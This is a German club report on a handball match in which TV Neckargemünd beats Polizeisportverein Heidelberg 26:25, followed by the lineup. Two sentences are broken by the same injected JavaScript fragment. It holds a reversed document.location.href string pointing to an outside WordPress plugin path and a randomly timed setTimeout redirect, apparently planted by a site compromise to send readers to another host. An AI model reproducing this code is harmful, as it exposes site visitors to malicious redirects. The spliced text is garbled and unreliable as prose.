Am, dem Samstag 21. März 2015 empfing der TV Neckargemünd die Gäste vom Polizeisportverein Heidelberg. Das Hinspiel war in schlechter Erinnerung. Mit einem großen Kader und Verstärkung von zahlreichen Jugendspielern aus drei Mannschaften stand man einem ernstzunehmenden Gegner gegenüber.
Neckargemünd, 22.03.15 (ast) –Die erste Halbzeit begann mit der Führung und obwohl man diese schnell wieder abgeben musste, war das erste Viertel eine Partie auf Augenhöhe. Dann aber fiel der TVN immer weiter zurück. Es war die übliche Geschichte, wie man sie in vielen Spielen, ob daheim oder auswärts, beobachten konnte. Vergebene Chancen, unüberlegte Abschlüsse, Larifari in der Abwehr, technische Fehler und dem gegenüber ein solider Gegner, der alles gerade etwas besser machte, als man selbst. So Stand es zur Halbzeit 10:15.
Die zweite Hälfte startete keineswegs vielversprechend, denn zunächst dauerte der Rückstand an. Plötzlich gelang allerdings ein Aufschwung im Spiel der Neckargemünder. Man konnte den Abstand von 5 auf 3 Tore reduzieren. Dann fiel der Ausgleich quasi zu Beginn des letzten Viertels. Diese Aufschwungswelle nahm man auf und hielt sich auf ihr. Führungstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor!
Den Gästen gelang noch einmal der Ausgleich, aber dann ließ der TVN diese Welle nicht mehr los und so stand es am Ende doch verdient 26:25.
Sicherlich auch Dank der toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tollen Atmosphäre in der heimischen Halle!
Es spielten:
Im Tor: Bastian Kirschmer.
Im Feld: J. Hünnerkopf, S. Kronbichler, N. Heinze, A. Wallstab (5), N. Berner (1), C. Pabst (5), J. Thieme (4), R. Baron, J. Hermstedt (9), T. Uremovic (2).